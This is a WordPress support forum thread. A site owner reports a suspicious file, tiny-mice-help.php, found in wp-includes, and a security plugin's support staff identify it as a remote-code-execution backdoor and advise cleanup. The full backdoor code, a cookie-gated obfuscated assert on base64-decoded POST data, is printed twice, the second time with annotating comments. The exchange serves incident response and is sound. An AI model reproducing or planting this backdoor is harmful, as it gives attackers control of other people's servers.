• Resolved Jan444

    (@ign2009)



    Hi guys, I’d like to take your attention to this mysterious file that has popped up in some of my sites and I suspect is a virus.

    The file is called tiny-mice-help.php and is located (created now mid-November) in /wp-includes/js/tiny-mice/ and it goes like so:

    if((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")){error_reporting(0);@array_map("as"."sert",(array) base64_decode($_POST[x]));} if((@$_COOKIE[wprid]=="59857777ad9b3")){die(md5('ok'));}

    Let me know if this could be something.
    Thanks!

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfdave

    (@wfdave)

    Hi @ign2009,

    You should immediately remove that file and run further scans on your website.

    Looking at the code, it is a backdoor that allows attackers to execute code on your server remotely.

    //only allows the attacker who uses a special token for the ssid cookie
    if ((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")) {
        error_reporting(0);
    
         //remotely executes code from $_POST
        @array_map("as"."sert", (array) base64_decode($_POST[x]));
    }
    
    //probably an easy way for the attacker to see if your website has the backdoor installed or not
    if ((@$_COOKIE[wprid]=="59857777ad9b3")) {
        die(md5('ok'));
    }

    Dave

    Jan444

    (@ign2009)

    Hi Dave, many thanks. I was all day dealing with this. I performed scans with WordFence, removed offending files (some were newly created with strange characters, others were modified with eval injections), and cleaned old themes and plugins.

    Re-installed WordPress, removed old installs, updated all plugins and themes everywhere, updated WordPress everywhere, removed lots of un-used themes.

    Now the scans are showing all is fine.

    I’ll wait and see but I’d say the situation is under control as no other “suspicious file modification” warning has popped up for the last hours, which was the way I noticed the problem.

    Thanks for your great plugin!
    Cheers,
    Jan

    Plugin Support wfdave

    (@wfdave)

    That’s great! You’ve definitely taken all the necessary precautions to secure your site.

    Please let us know if there’s any new suspicious activity on your site here.

    Thanks!

Viewing 3 replies - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.